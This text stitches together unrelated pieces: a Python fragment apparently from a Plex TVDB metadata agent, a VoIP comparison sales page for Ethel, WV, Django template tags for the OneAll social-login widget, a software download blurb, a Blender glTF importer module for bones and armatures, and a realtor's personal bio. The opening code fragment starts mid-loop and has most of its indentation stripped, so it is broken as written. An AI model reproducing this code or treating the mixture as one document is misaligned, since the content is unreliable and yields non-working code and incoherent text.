for banner in sorted(bannersXml.xpath("./Banner"), key=lambda x: float(GetElementText(x, "Rating", 0)) , reverse=True):
bannerType = GetElementText(banner, "BannerType")
bannerType2 = GetElementText(banner, "BannerType2")
bannerPath = GetElementText(banner, "BannerPath")
bannerThumb = GetElementText(banner, "ThumbnailPath")
if bannerThumb == None or bannerThumb == "":
bannerThumb = os.path.splitext(bannerPath)[0] + '_t' + os.path.splitext(bannerPath)[1]
metatype = ("art" if bannerType == "fanart" else \
"posters" if bannerType == "poster" else \
"banners" if bannerType == "series" or bannerType2=="seasonwide" else \
"season" if bannerType == "season" and bannerType2=="680x1000" else \
"season" if bannerType == "season" and bannerType2=="season" else None)
#Log("Images: %s, %s, %s, %s, %s" % (bannerPath, constants.TVDB_IMAGES_URL, id, metatype, bannerThumb))
                    if metatype is None:
                        continue  # skip banner types we do not recognize
                    mainUrl, thumbUrl, mainLocalPath, thumbLocalPath = functions.ParseImage(bannerPath, constants.TVDB_IMAGES_URL, os.path.join("TvDB", id, metatype), bannerThumb)
if metatype == "art":
SubElement(art, "Image", id = str(1 if bannerPath == GetElementText(data, "Series/fanart") else artCount), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
artCount = artCount + 1
if metatype == "posters":
SubElement(posters, "Image", id = str(1 if bannerPath == GetElementText(data, "Series/poster") else postersCount), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
postersCount = postersCount + 1
if metatype == "banners":
SubElement(banners, "Image", id = str(1 if bannerPath == GetElementText(data, "Series/banner") else bannersCount), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
bannersCount = bannersCount + 1
if metatype == "season":
seasonCount.append(GetElementText(banner, "Season"))
SubElement(season, "Image", id = str(seasonCount.count(GetElementText(banner, "Season"))), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath, season = str(GetElementText(banner, "Season")))
self.Art = art
self.Posters = posters
self.Banners = banners
self.Season = season
##--------------------------------Themes-------------------------------##
self.Themes = []
##--------------------------------EpisodeCount-------------------------##
self.EpisodeCount = len(data.xpath("""./Episode/SeasonNumber[text()>0]"""))
##--------------------------------SpecialCount-------------------------##
self.SpecialCount = len(data.xpath("""./Episode/SeasonNumber[text()=0]"""))
##--------------------------------Duration-----------------------------##
if GetElementText(data, "Series/Runtime"):
self.Duration = int(int(self.EpisodeCount) * int(GetElementText(data, "Series/Runtime")))
##--------------------------------OP/ED_List---------------------------##
self.OpList = []
self.EdList = []
##--------------------------------Episodes-----------------------------##
if len(data.xpath("""./Episode""")) > 0:
self.Episodes = []
for item in data.xpath("""./Episode"""):
self.Episodes.append(self.Episode(item, id))
#Log("AniDB - __init__() - Populate Title: '%s', Network: '%s', Overview: '%s', FirstAired: '%s', Genre: '%s', ContentRating: '%s', Rating: '%s', Episodes: '%s', EpisodeCount: '%s', SpecialCount: '%s', OpedCount: '%s', Posters: '%s'"
#% (self.Title, self.Network, self.Overview, self.FirstAired, self.Genre, self.ContentRating, self.Rating, self.Episodes, self.EpisodeCount, self.SpecialCount, self.OpedCount, self.Posters) )
logging.Log_Milestone("TvDB" + "_" + id)
class Episode(constants.Episode):
def __init__(self, data, id):
##--------------------------------Title--------------------------------##
if GetElementText(data, "EpisodeName"):
self.Title = str(GetElementText(data, "EpisodeName")).encode('utf-8').strip().translate(constants.ReplaceChars)
##--------------------------------Summary------------------------------##
if GetElementText(data, "Overview"):
self.Summary = GetElementText(data, "Overview")
##--------------------------------Originally_Available_At--------------##
if GetElementText(data, "FirstAired" ):
self.Originally_Available_At = GetElementText(data, "FirstAired")
##--------------------------------Rating-------------------------------##
if GetElementText(data, "Rating"):
self.Rating = GetElementText(data, "Rating")
##--------------------------------Absolute_Index-----------------------##
if GetElementText(data, "absolute_number"):
self.Absolute_Index = int(GetElementText(data, "absolute_number"))
##--------------------------------Writers------------------------------##
if GetElementText(data, "Writer"):
if self.Writers is None: self.Writers = []
self.Writers.append(GetElementText(data, "Writer"))
##--------------------------------Directors----------------------------##
if GetElementText(data, "Director"):
if self.Directors is None: self.Directors = []
self.Directors.append(GetElementText(data, "Director"))
##--------------------------------Producers----------------------------##
##--------------------------------Thumbs-------------------------------##
if GetElementText(data, "filename"):
root = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
root = XML.ElementFromString(root)
bannerPath = GetElementText(data, "filename")
bannerThumb = os.path.splitext(bannerPath)[0] + '_t' + os.path.splitext(bannerPath)[1]
mainUrl, thumbUrl, mainLocalPath, thumbLocalPath = functions.ParseImage(bannerPath, constants.TVDB_IMAGES_URL, os.path.join("TvDB", id, "thumbs"), bannerThumb)
SubElement(root, "Image", id = "1", mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
self.Thumbs = root
##--------------------------------Number-------------------------------##
if GetElementText(data, "EpisodeNumber"):
self.Number = str(GetElementText(data, "EpisodeNumber")).zfill(2)
##--------------------------------Season-------------------------------##
if GetElementText(data, "SeasonNumber"):
self.Season = str(GetElementText(data, "SeasonNumber")).zfill(2)
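# Rough usage sketch (illustrative; this module expects a Plex plugin
# environment that provides the XML, Log and CACHE_1HOUR globals, so it will
# not run standalone):
#
#     series = TvDB("81189")  # hypothetical TVDB series id
#     print series.Title, series.EpisodeCount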
|
Compare the best business VoIP providers in Ethel, WV side by side on VoipReview. Find and compare top-rated providers across price, features, ratings, and user-submitted reviews to find the best deal on a business VoIP service. Start comparing below to see how much you can be saving on your monthly phone bill.
What is VoIP for Business in Ethel, WV?
VoIP (Voice over Internet Protocol) for business is a phone technology designed to meet your company's communication needs. Business VoIP in Ethel, WV works by using your high-speed internet connection to place and receive phone calls, and gives companies of all sizes the features and flexibility to meet their individual demands.
VoIP plans exist for both commercial and household use in Ethel, WV. What sets them apart is that commercial plans concentrate on the tools and special features that companies need to be successful, whereas home plans include standard features and regular inbound and outbound calling.
Individuals who are considering business VoIP in Ethel, WV can easily compare the different providers and plans based on a number of criteria ranging from features, monthly pricing, and customer ratings. At VoipReview, we provide easy comparison tools to help people analyze different VoIP providers and find the one that best suits their needs.
Those in Ethel, WV who wish to take the next step and obtain a personalized quote are also in luck because we do all of the work for them. All that's needed is to fill in the above form, and we will instantly provide a list of top VoIP providers in Ethel, WV that meet their requirements.
What is the Difference Between Business VoIP in Ethel, WV and Traditional Phone Service?
Remember that while we always make an effort to provide you with accurate and complete information, prices and included services may sometimes change. For this reason, it is always a good idea to read through the websites of the Ethel, WV VoIP providers we present, ensuring you get the most accurate information on what their plans include, their prices, the terms and limitations of promotional offers, and any additional fees that could apply to you.
# -*- coding: utf-8 -*-
from json import dumps
from django.template import Library
from django.utils.html import escape
from django.utils.safestring import mark_safe
from ..app import settings
from ..models import SocialUserCache, get_user_model
register = Library()
@register.inclusion_tag('oneall/header.html')
def oneall_header():
"""
OneAll required script.
This must go in the ``<head>...</head>`` section of your templates,
otherwise widgets won't load.
"""
return {'oneall_site_name': settings.credentials['site_name']}
@register.inclusion_tag('oneall/social_login.html')
def oneall_social_login(user=None, **kwargs):
"""
This tag displays the Social Login or Social Link widget.
Don't forget to include ``{% oneall_header %}``!
:param user: Logged in user for Social Link mode; if not provided, it's Social Login mode.
:param kwargs: Widget options as documented by OneAll. For example, ``grid_sizes=[8,5]``
"""
if isinstance(user, get_user_model()):
social_user = SocialUserCache.objects.filter(user=user).first()
if social_user:
kwargs['user_token'] = str(social_user.user_token)
else:
user = None # no cached social user, thus revert to social login mode
widget_settings = {}
for key, value in settings.login_widget(kwargs).items():
widget_settings[key] = mark_safe(dumps(value))
return {
'settings': widget_settings,
'mode': 'social_link' if user else 'social_login',
}
@register.inclusion_tag('oneall/social_sharing.html')
def oneall_share(layout='s', **kwargs):
"""
This tag display the `Social Sharing`_ widget.
.. _Social Sharing: https://www.oneall.com/services/social-sharing/
Don't forget to include ``{% oneall_header %}``!
:param layout: Button layout as defined by the Social Sharing Wizard.
:param kwargs: Social link arguments.
"""
layout = str(layout).lower()
    if layout not in ('s', 'm', 'l', 'h', 'v'):
        raise ValueError("Invalid layout (%s). Must be one of S, M, L, H or V." % layout)
args = ' '.join(('data-%s="%s"' % (k, escape(v)) for k, v in kwargs.items()))
return {
'layout': layout,
'arguments': mark_safe(args),
'networks': settings.share_widget['networks']
}
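# Example template usage (a sketch; the ``{% load %}`` label depends on the
# name of this templatetags module in your app):
#
#     {% load oneall %}
#     <head>{% oneall_header %}</head>
#     {% oneall_social_login user=request.user %}
#     {% oneall_share 'm' url=request.build_absolute_uri %}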
|
Quickly and easily switch between 2 sets of mouse settings. This is ideal for laptop users who switch between the touchpad and an external mouse but want a different pointer speed/sensitivity for each device. Mouse Speed Switcher can be used free of charge; however, by registering your own copy you will receive a license key that will remove all reminder messages.
Qweas is providing links to Mouse Speed Switcher 3.0.0 as a courtesy, and makes no representations regarding Mouse Speed Switcher or any other applications or any information related thereto.
Any questions, complaints or claims regarding this application Mouse Speed Switcher 3.0.0 must be directed to the appropriate software vendor.
You may click the publisher link of Mouse Speed Switcher on the top of this page to get more details about the vendor. |
from math import pi
from mathutils import Matrix, Quaternion, Vector, Euler
from .compat import mul
from .mesh import mesh_name
# The node graph in glTF needs to fixed up quite a bit before it will work for
# Blender. We first create a graph of "virtual nodes" to match the graph in the
# glTF file and then transform it in a bunch of passes to make it suitable for
# Blender import.
class VNode:
def __init__(self):
# The ID of the glTF node this vnode was created from, or None if there
# wasn't one
self.node_id = None
# List of child vnodes
self.children = []
# Parent vnode, or None for the root
self.parent = None
# (Vector, Quaternion, Vector) triple of the local-to-parent TRS transform
self.trs = (Vector((0, 0, 0)), Quaternion((1, 0, 0, 0)), Vector((1, 1, 1)))
# What type of Blender object will be created for this vnode: one of
        # OBJECT, ARMATURE, BONE, or ROOT (for the special vnode that we use to
# turn the forest into a tree to make things easier to process).
self.type = 'OBJECT'
# Dicts of instance data
self.mesh = None
self.camera = None
self.light = None
# If this node had an instance in glTF but we moved it to another node,
# we record where we put it here
self.mesh_moved_to = None
self.camera_moved_to = None
self.light_moved_to = None
# These will be filled out after realization with the Blender data
# created for this vnode.
self.blender_object = None
self.blender_armature = None
self.blender_editbone = None
self.blender_name = None
# The editbone's (Translation, Rotation)
self.editbone_tr = None
        self.pose_s = None  # pose bone scale set at load time (see adjust_bones)
self.editbone_local_to_armature = Matrix.Identity(4)
self.bone_length = 0
# Correction to apply to the original TRS to get the editbone TR
self.correction_rotation = Quaternion((1, 0, 0, 0))
self.correction_homscale = 1
def create_vtree(op):
initial_vtree(op)
insert_armatures(op)
move_instances(op)
adjust_bones(op)
# In the first pass, create the vgraph from the forest from the glTF file,
# making one OBJECT for each node
#
# OBJ
# / \
# OBJ OBJ
# / \
# OBJ OBJ
#
# (The ROOT is also added, but we won't draw it)
def initial_vtree(op):
nodes = op.gltf.get('nodes', [])
op.node_id_to_vnode = {}
# Create a vnode for each node
for node_id, node in enumerate(nodes):
vnode = VNode()
vnode.node_id = node_id
vnode.name = node.get('name', 'nodes[%d]' % node_id)
vnode.trs = get_node_trs(op, node)
vnode.type = 'OBJECT'
if 'mesh' in node:
vnode.mesh = {
'mesh': node['mesh'],
'primitive_idx': None, # use all primitives
'skin': node.get('skin'),
'weights': node.get('weights', op.gltf['meshes'][node['mesh']].get('weights')),
}
if 'camera' in node:
vnode.camera = {
'camera': node['camera'],
}
if 'KHR_lights_punctual' in node.get('extensions', {}):
vnode.light = {
'light': node['extensions']['KHR_lights_punctual']['light'],
}
op.node_id_to_vnode[node_id] = vnode
# Fill in the parent/child relationships
for node_id, node in enumerate(nodes):
vnode = op.node_id_to_vnode[node_id]
for child_id in node.get('children', []):
child_vnode = op.node_id_to_vnode[child_id]
# Prevent cycles
assert(child_vnode.parent == None)
child_vnode.parent = vnode
vnode.children.append(child_vnode)
# Add a root node to make the forest of vnodes into a tree.
op.root_vnode = VNode()
op.root_vnode.type = 'ROOT'
for vnode in op.node_id_to_vnode.values():
if vnode.parent == None:
vnode.parent = op.root_vnode
op.root_vnode.children.append(vnode)
# There is no special kind of node used for skinning in glTF. Joints are just
# regular nodes. But in Blender, only a bone can be used for skinning and bones
# are descendants of armatures.
#
# In the second pass we insert enough ARMATURE vnodes into the vtree so that
# every vnode which is the joint of a skin is a descendant of an ARMATURE. All
# descendants of ARMATURES are then turned into bones.
#
# OBJ
# / \
# OBJ ARMA
# |
# BONE
# / \
# BONE BONE
def insert_armatures(op):
# Insert an armature for every skin
skins = op.gltf.get('skins', [])
for skin_id, skin in enumerate(skins):
armature = VNode()
armature.name = skin.get('name', 'skins[%d]' % skin_id)
armature.type = 'ARMATURE'
# We're going to find a place to insert the armature. It must be above
# all of the joint nodes.
vnodes_below = [op.node_id_to_vnode[joint_id] for joint_id in skin['joints']]
# Add in the skeleton node too (which we hope is an ancestor of the joints).
if 'skeleton' in skin:
vnodes_below.append(op.node_id_to_vnode[skin['skeleton']])
ancestor = lowest_common_ancestor(vnodes_below)
ancestor_is_joint = ancestor.node_id in skin['joints']
if ancestor_is_joint:
insert_above(ancestor, armature)
else:
insert_below(ancestor, armature)
# Walk down the tree, marking all children of armatures as bones and
# deleting any armature which is a descendant of another.
def visit(vnode, armature_ancestor):
# Make a copy of this because we don't want it to change (when we delete
# a vnode) while we're in the middle of iterating it
children = list(vnode.children)
# If we are below an armature...
if armature_ancestor:
# Found an armature descended of another
if vnode.type == 'ARMATURE':
remove_vnode(vnode)
else:
vnode.type = 'BONE'
vnode.armature_vnode = armature_ancestor
else:
if vnode.type == 'ARMATURE':
armature_ancestor = vnode
for child in children:
visit(child, armature_ancestor)
visit(op.root_vnode, None)
# Now we need to enforce Blender's rule that (1) an object may have only one
# data instance (ie. only one of a mesh or a camera or a light), and (2) a bone
# may not have a data instance at all. We also need to move all cameras/lights
# to new children so that we have somewhere to hang the glTF->Blender axis
# conversion they need.
#
#
# OBJ Eg. if there was a mesh and camera on OBJ1
# / \ we will move the camera to a new child OBJ3
# OBJ1 ARMA (leaving the mesh on OBJ1).
# / | And if there was a mesh on BONE2 we will move
# OBJ3 BONE the mesh to OBJ4
# / \
# BONE BONE2
# |
# OBJ4
def move_instances(op):
def move_instance_to_new_child(vnode, key):
inst = getattr(vnode, key)
setattr(vnode, key, None)
if key == 'mesh':
id = inst['mesh']
name = op.gltf['meshes'][id].get('name', 'meshes[%d]' % id)
elif key == 'camera':
id = inst['camera']
name = op.gltf['cameras'][id].get('name', 'cameras[%d]' % id)
elif key == 'light':
id = inst['light']
lights = op.gltf['extensions']['KHR_lights_punctual']['lights']
name = lights[id].get('name', 'lights[%d]' % id)
else:
assert(False)
new_child = VNode()
new_child.name = name
new_child.parent = vnode
vnode.children.append(new_child)
new_child.type = 'OBJECT'
setattr(new_child, key, inst)
setattr(vnode, key + '_moved_to', [new_child])
if key in ['camera', 'light']:
# Quarter-turn around the X-axis. Needed for cameras or lights that
# point along the -Z axis in Blender but glTF says should look along the
# -Y axis
new_child.trs = (
new_child.trs[0],
Quaternion((2**(-1/2), 2**(-1/2), 0, 0)),
new_child.trs[2]
)
return new_child
def visit(vnode):
# Make a copy of this so we don't re-process new children we just made
children = list(vnode.children)
# Always move a camera or light to a child because it needs the
# gltf->Blender axis conversion
if vnode.camera:
move_instance_to_new_child(vnode, 'camera')
if vnode.light:
move_instance_to_new_child(vnode, 'light')
if vnode.mesh and vnode.type == 'BONE':
move_instance_to_new_child(vnode, 'mesh')
for child in children:
visit(child)
visit(op.root_vnode)
# The user can request that meshes be split into their primitives, like this
#
# OBJ => OBJ
# (mesh) / | \
# OBJ OBJ OBJ
# (mesh)(mesh)(mesh)
if op.options['split_meshes']:
def visit(vnode):
children = list(vnode.children)
if vnode.mesh is not None:
num_prims = len(op.gltf['meshes'][vnode.mesh['mesh']]['primitives'])
if num_prims > 1:
new_children = []
for prim_idx in range(0, num_prims):
child = VNode()
child.name = mesh_name(op, (vnode.mesh['mesh'], prim_idx))
child.type = 'OBJECT'
child.parent = vnode
child.mesh = {
'mesh': vnode.mesh['mesh'],
'skin': vnode.mesh['skin'],
'weights': vnode.mesh['weights'],
'primitive_idx': prim_idx,
}
new_children.append(child)
vnode.mesh = None
vnode.children += new_children
vnode.mesh_moved_to = new_children
for child in children:
visit(child)
visit(op.root_vnode)
# Here's the complicated pass.
#
# Brief review: every bone in glTF has a local-to-parent transform T(b;pose).
# Sometimes we suppress the dependence on the pose and just write T(b). The
# composition with the parent's local-to-parent, and so on up the armature is
# the local-to-armature transform
#
# L(b) = T(root) ... T(ppb) T(pb) T(b)
#
# where pb is the parent of b, ppb is the grandparent, etc. In Blender the
# local-to-armature is
#
# LB(b) = E(root) P(root) ... E(ppb) P(ppb) E(pb) P(pb) E(b) P(b)
#
# where E(b) is a TR transform for the edit bone and P(b) is a TRS transform for
# the pose bone.
#
# NOTE: I am not entirely sure of that formula.
#
# In the rest position P(b;rest) = 1 for all b, so we would like to just make
# E(b) = T(b;rest), but we can't since T(b;rest) might have a scaling, and we
# also want to try to rotate T(b) so we can pick which way the Blender
# octahedron points.
#
# So we're going to change T(b). For every bone b pick a rotation cr(b) and a
# scalar cs(b) and define the correction matrix for b to be
#
# C(b) = Rot[cr(b)] HomScale[cs(b)]
#
# and transform T(b) to
#
# T'(b) = C(pb)^{-1} T(b) C(b)
#
# If we compute L'(b) using the T'(b), most of the C terms cancel out and we get
#
# L'(b) = L(b) C(b)
#
# This is close enough; we'll be able to cancel off the extra C(b) later.
#
# How do we pick C(b)? Assume we've already computed C(pb) and calculate T'(b)
#
# T'(b)
# = C(pb)^{-1} T(b) C(b)
# = Rot[cr(pb)^{-1}] HomScale[1/cs(pb)]
# Trans[t] Rot[r] Scale[s]
# Rot[cr(b)] HomScale[cs(b)]
# { floating the Trans to the left, combining Rots }
# = Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ]
# Rot[cr(pb)^{-1} r] HomScale[1/cs(pb)] Scale[s]
# Rot[cr(b)] HomScale[cs(b)]
#
# Now assume Scale[s] = HomScale[s] (and s is not 0), ie. the bone has a
# homogeneous scaling. Then we can rearrange this and get
#
# Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ]
# Rot[cr(pb)^{-1} r cr(b)]
# HomScale[s cs(b) / cs(pb)]
#
# Now if we want the rotation to be R we can pick cr(b) = r^{-1} cr(pb) R. We
# also want the scale to be 1, because again, E(b) has a scaling of 1 in Blender
# always, so we pick cs(b) = cs(pb) / s.
#
# Okay, cool, so this is now a TR matrix and we can identify it with E(b).
#
# But what if Scale[s] **isn't** homogeneous? We appear to have no choice but to
# put it on P(b;loadtime) for some non-rest pose we'll set at load time. This is
# unfortunate because the rest pose in Blender won't be the same as the rest
# pose in glTF (and there's inverse bind matrix fallout too).
#
# So in that case we'll take C(b) = 1, and set
#
# E(b) = Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ] Rot[cr(pb)^{-1} r]
# P(b;loadtime) = Scale[s / cs(pb)]
#
# So in both cases we now have LB(b) = L'(b).
#
# TODO: we can still pick a rotation when the scaling is heterogeneous
# Maps an axis into a rotation carrying that axis into +Y
AXIS_TO_PLUS_Y = {
'-X': Euler([0, 0, -pi/2]).to_quaternion(),
'+X': Euler([0, 0, pi/2]).to_quaternion(),
'-Y': Euler([pi, 0, 0]).to_quaternion(),
'+Y': Euler([0, 0, 0]).to_quaternion(),
'-Z': Euler([pi/2, 0, 0]).to_quaternion(),
'+Z': Euler([-pi/2, 0, 0]).to_quaternion(),
}
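# A quick sanity check of the table above (illustrative, not executed by the
# importer): every listed axis should be carried onto +Y.
#
#     units = {'-X': Vector((-1, 0, 0)), '+X': Vector((1, 0, 0)),
#              '-Y': Vector((0, -1, 0)), '+Y': Vector((0, 1, 0)),
#              '-Z': Vector((0, 0, -1)), '+Z': Vector((0, 0, 1))}
#     for axis, quat in AXIS_TO_PLUS_Y.items():
#         assert (mul(quat, units[axis]) - Vector((0, 1, 0))).length < 1e-6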
def adjust_bones(op):
# List of distances between bone heads (used for computing bone lengths)
interbone_dists = []
def visit_bone(vnode):
t, r, s = vnode.trs
cr_pb_inv = vnode.parent.correction_rotation.conjugated()
cs_pb = vnode.parent.correction_homscale
# Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ]
editbone_t = mul(cr_pb_inv, t) / cs_pb
if is_non_degenerate_homscale(s):
            # s is a homogeneous scaling (ie. scalar multiplication)
s = s[0]
# cs(b) = cs(pb) / s
vnode.correction_homscale = cs_pb / s
if op.options['bone_rotation_mode'] == 'POINT_TO_CHILDREN':
# We always pick a rotation for cr(b) that is, up to sign, a permutation of
# the basis vectors. This is necessary for some of the algebra to work out
                # in animation importing.
# General idea: assume we have one child. We want to rotate so
# that our tail comes close to the child's head. Out tail lies
# on our +Y axis. The child head is going to be Rot[cr(b)^{-1}]
# child_t / cs(b) where b is us and child_t is the child's
# trs[0]. So we want to choose cr(b) so that this is as close as
# possible to +Y, ie. we want to rotate it so that its largest
# component is along the +Y axis. Note that only the sign of
# cs(b) affects this, not its magnitude (since the largest
# component of v, 2v, 3v, etc. are all the same).
                # Pick the target to rotate towards. If we have one child, use
# that.
if len(vnode.children) == 1:
target = vnode.children[0].trs[0]
elif len(vnode.children) == 0:
# As though we had a child displaced the same way we were
# from our parent.
target = vnode.trs[0]
else:
# Mean of all our children.
center = Vector((0, 0, 0))
for child in vnode.children:
center += child.trs[0]
center /= len(vnode.children)
target = center
if cs_pb / s < 0:
target = -target
x, y, z = abs(target[0]), abs(target[1]), abs(target[2])
if x > y and x > z:
axis = '-X' if target[0] < 0 else '+X'
elif z > x and z > y:
axis = '-Z' if target[2] < 0 else '+Z'
else:
axis = '-Y' if target[1] < 0 else '+Y'
cr_inv = AXIS_TO_PLUS_Y[axis]
cr = cr_inv.conjugated()
elif op.options['bone_rotation_mode'] == 'NONE':
cr = Quaternion((1, 0, 0, 0))
else:
assert(False)
vnode.correction_rotation = cr
# cr(pb)^{-1} r cr(b)
editbone_r = mul(mul(cr_pb_inv, r), cr)
else:
# TODO: we could still use a rotation here.
# C(b) = 1
vnode.correction_rotation = Quaternion((1, 0, 0, 0))
vnode.correction_homscale = 1
# E(b) = Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ] Rot[cr(pb)^{-1} r]
# P(b;loadtime) = Scale[s / cs(pb)]
editbone_r = mul(cr_pb_inv, r)
vnode.pose_s = s / cs_pb
vnode.editbone_tr = editbone_t, editbone_r
vnode.editbone_local_to_armature = mul(
vnode.parent.editbone_local_to_armature,
mul(Matrix.Translation(editbone_t), editbone_r.to_matrix().to_4x4())
)
interbone_dists.append(editbone_t.length)
# Try getting a bone length for our parent. The length that makes its
# tail meet our head is considered best. Since the tail always lies
        # along the +Y ray, the closer we are to this ray the better our
        # length will be compared to the lengths chosen by our siblings. This is
        # measured by the "goodness". Among siblings with equal goodness, we
# pick the smaller length, so the parent's tail will meet the nearest
# child.
vnode.bone_length_goodness = -99999
if vnode.parent.type == 'BONE':
t_len = editbone_t.length
if t_len > 0.0005:
goodness = editbone_t.dot(Vector((0, 1, 0))) / t_len
if goodness > vnode.parent.bone_length_goodness:
if vnode.parent.bone_length == 0 or vnode.parent.bone_length > t_len:
vnode.parent.bone_length = t_len
vnode.parent.bone_length_goodness = goodness
# Recurse
for child in vnode.children:
if child.type == 'BONE':
visit_bone(child)
# We're on the way back up. Last chance to set our bone length if none
# of our children did. Use our parent's, if it has one. Otherwise, use
        # the average inter-bone distance, if it's not 0. Otherwise, just use 1
# -_-
if not vnode.bone_length:
if vnode.parent.bone_length:
vnode.bone_length = vnode.parent.bone_length
else:
avg = sum(interbone_dists) / max(1, len(interbone_dists))
if avg > 0.0005:
vnode.bone_length = avg
else:
vnode.bone_length = 1
def visit(vnode):
if vnode.type == 'ARMATURE':
for child in vnode.children:
visit_bone(child)
else:
for child in vnode.children:
visit(child)
visit(op.root_vnode)
# Remember that L'(b) = L(b) C(b)? Remember that we had to move any
# mesh/camera/light on a bone to an object? That's the perfect place to put
# a transform of C(b)^{-1} to cancel out that extra factor!
def visit_object_child_of_bone(vnode):
t, r, s = vnode.trs
# This moves us back along the bone, because for some reason Blender
# puts us at the tail of the bone, not the head
t -= Vector((0, vnode.parent.bone_length, 0))
# Rot[cr^{-1}] HomScale[1/cs] Trans[t] Rot[r] Scale[s]
# = Trans[ Rot[cr^{-1}] t / cs] Rot[cr^{-1} r] Scale[s / cs]
cr_inv = vnode.parent.correction_rotation.conjugated()
cs = vnode.parent.correction_homscale
t = mul(cr_inv, t) / cs
r = mul(cr_inv, r)
s /= cs
vnode.trs = t, r, s
def visit(vnode):
if vnode.type == 'OBJECT' and vnode.parent.type == 'BONE':
visit_object_child_of_bone(vnode)
for child in vnode.children:
visit(child)
visit(op.root_vnode)
# Helper functions below here:
def get_node_trs(op, node):
"""Gets the TRS proerties from a glTF node JSON object."""
if 'matrix' in node:
m = node['matrix']
# column-major to row-major
m = Matrix([m[0:4], m[4:8], m[8:12], m[12:16]])
m.transpose()
loc, rot, sca = m.decompose()
# wxyz -> xyzw
# convert_rotation will switch back
rot = [rot[1], rot[2], rot[3], rot[0]]
else:
sca = node.get('scale', [1.0, 1.0, 1.0])
rot = node.get('rotation', [0.0, 0.0, 0.0, 1.0])
loc = node.get('translation', [0.0, 0.0, 0.0])
# Switch glTF coordinates to Blender coordinates
sca = op.convert_scale(sca)
rot = op.convert_rotation(rot)
loc = op.convert_translation(loc)
return [Vector(loc), Quaternion(rot), Vector(sca)]
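# For example (illustrative, assuming the usual glTF Y-up to Blender Z-up
# conversion): a node {"translation": [1, 2, 3]} with no matrix, rotation, or
# scale decodes to roughly (Vector((1, -3, 2)), Quaternion((1, 0, 0, 0)),
# Vector((1, 1, 1))); the exact values depend on op.convert_translation and
# friends.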
def lowest_common_ancestor(vnodes):
"""
Compute the lowest common ancestors of vnodes, ie. the lowest node of which
    all the given vnodes are (possibly improper) descendants.
"""
assert(vnodes)
def ancestor_list(vnode):
"""
Computes the ancestor-list of vnode: the list of all its ancestors
starting at the root and ending at vnode itself.
"""
chain = []
while vnode:
chain.append(vnode)
vnode = vnode.parent
chain.reverse()
return chain
def first_difference(l1, l2):
"""
Returns the index of the first difference in two lists, or None if one is
a prefix of the other.
"""
i = 0
while True:
if i == len(l1) or i == len(l2):
return None
if l1[i] != l2[i]:
return i
i += 1
# Ancestor list for the lowest common ancestor so far
lowest_ancestor_list = ancestor_list(vnodes[0])
for vnode in vnodes[1:]:
cur_ancestor_list = ancestor_list(vnode)
d = first_difference(lowest_ancestor_list, cur_ancestor_list)
if d is None:
if len(cur_ancestor_list) < len(lowest_ancestor_list):
lowest_ancestor_list = cur_ancestor_list
else:
lowest_ancestor_list = lowest_ancestor_list[:d]
return lowest_ancestor_list[-1]
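# For example, in the tree ROOT -> A -> {B, C}, lowest_common_ancestor([B, C])
# builds the ancestor lists [ROOT, A, B] and [ROOT, A, C], truncates at the
# first difference, and returns A.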
def insert_above(vnode, new_parent):
"""
Inserts new_parent between vnode and its parent. That is, turn
parent -> sister parent -> sister
-> vnode into -> new_parent -> vnode
-> sister -> sister
"""
if not vnode.parent:
vnode.parent = new_parent
new_parent.parent = None
new_parent.children = [vnode]
else:
parent = vnode.parent
i = parent.children.index(vnode)
parent.children[i] = new_parent
new_parent.parent = parent
new_parent.children = [vnode]
vnode.parent = new_parent
def insert_below(vnode, new_child):
"""
Insert new_child between vnode and its children. That is, turn
vnode -> child vnode -> new_child -> child
-> child into -> child
-> child -> child
"""
children = vnode.children
vnode.children = [new_child]
new_child.parent = vnode
new_child.children = children
for child in children:
child.parent = new_child
def remove_vnode(vnode):
"""
Remove vnode from the tree, replacing it with its children. That is, turn
parent -> sister parent -> sister
-> vnode -> child into -> child
-> sister -> sister
"""
assert(vnode.parent) # will never be called on the root
parent = vnode.parent
children = vnode.children
i = parent.children.index(vnode)
parent.children = (
parent.children[:i] +
children +
parent.children[i+1:]
)
for child in children:
child.parent = parent
vnode.parent = None
vnode.children = []
def is_non_degenerate_homscale(s):
"""Returns true if Scale[s] is multiplication by a non-zero scalar."""
largest = max(abs(x) for x in s)
smallest = min(abs(x) for x in s)
if smallest < 1e-5:
# Too small; consider it zero
return False
return largest - smallest < largest * 0.001
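# e.g. is_non_degenerate_homscale(Vector((2, 2, 2))) -> True  (uniform)
#      is_non_degenerate_homscale(Vector((1, 2, 1))) -> False (heterogeneous)
#      is_non_degenerate_homscale(Vector((0, 0, 0))) -> False (zero scale)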
|
I moved to Innisfil from the Greater Toronto Area in 1983 with the purpose of raising our three children in a rural setting. Today, all three are happily married and very successful in their careers, and I am the proud Nana of four beautiful grandsons, Aiden & Avery (twins) and Nathaniel, and a gorgeous granddaughter, Teagan Rose. In 2010 God blessed us with "wee" Adam. He was born very tiny and missing his 21st chromosome. Adam doesn't talk per se, but when he communicates he speaks volumes. The doctors weren't giving anyone hope, but someone actually forgot to tell Adam that, because despite his limitations he is an active little boy. We call him our little miracle. Rounding things out, my sixth grandchild arrived in 2013 and lucky number seven on Valentine's Day 2016: two more granddaughters, Sofiya Grace and Amelia Rose. Life is busy, but I wouldn't have it any other way.
When real estate isn't keeping me hopping, I like to spend my time with my dog, my kids and grandkids. I love golfing and hope to spend my retirement years travelling the world.
After living in this community, I would never consider moving back to the fast pace of the city.
- Easter Seals Celebrity Golf Tournament, 2006, 2007, 2008, and 2010 to present.
- Big Brothers/Sisters Showcase of Homes, 2006, 2007, 2008, 2009, and 2010-2013.
- Spin for Kids for Nantyr Shores Secondary School, 2005 and 2008.
- Full Moon Dragon Boat Relay for Children's Aid Society, 2005 & 2006.
